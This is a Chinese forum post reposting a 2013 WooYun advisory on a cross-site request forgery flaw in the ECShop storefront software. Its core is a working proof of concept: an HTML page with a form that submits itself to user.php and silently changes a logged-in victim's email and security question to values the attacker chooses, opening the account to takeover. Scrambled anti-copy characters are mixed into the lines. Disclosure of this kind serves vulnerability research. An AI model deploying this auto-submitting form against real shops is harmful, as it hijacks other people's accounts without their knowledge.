找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1936|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
; \6 G/ W, \% D/ I! Wecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
* Y$ H3 }- K5 m* Q3 W) h* `9 D$ t. h: T, ^' G
Demo For:http://www.wooyun.org/bug.php?action=view&id=395, e0 K0 i. J, @8 ^( h) [* ^
- }$ N* T/ X$ h5 @4 r7 B" `
详细说明:
) c& i' K8 n9 @% I. W+ t3 I( y' k+ ^利用csrf和xss可以突破官方所说的“障碍”
, `9 H6 C! e; oxss版本已经有人说明
, c7 i# w2 O5 E# ?# q这里给出csrf版本7 x- p- m/ ^% g$ [
: D0 V/ I. Q7 n# {
漏洞证明:; ~1 }9 P( x: ?; o! \
<html>( Q4 ]2 U( M; o" H. a5 P
<body>
3 \* }( I% c$ e4 ^- Q1 K) E<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' O4 d2 ^1 k( D1 b2 w  w<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">4 Z; g; m8 c% E2 Q& x7 K" [$ S
<INPUT TYPE="text" NAME="act" value="act_edit_profile">7 L# V, ~) j* u% }8 }
<INPUT TYPE="text" NAME="sel_question" value="ecshop">' e6 ^. K; n# I! j! l) G& Y
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">: u; J% X  @- h
</body>& o9 t9 t0 C8 D
<script>
- G! }9 l0 y* u3 v& x1 Sdocument.forms[0].submit();- B1 H+ B$ Q4 ]0 ~
</script>' A! ~3 W0 Q$ C" _! l
</html>
8 ]! P, V) {. }+ C6 K构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失. J# f" t1 j  M1 i' k4 _* V
/ w7 [$ p7 q5 }( J  a  u$ }( l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表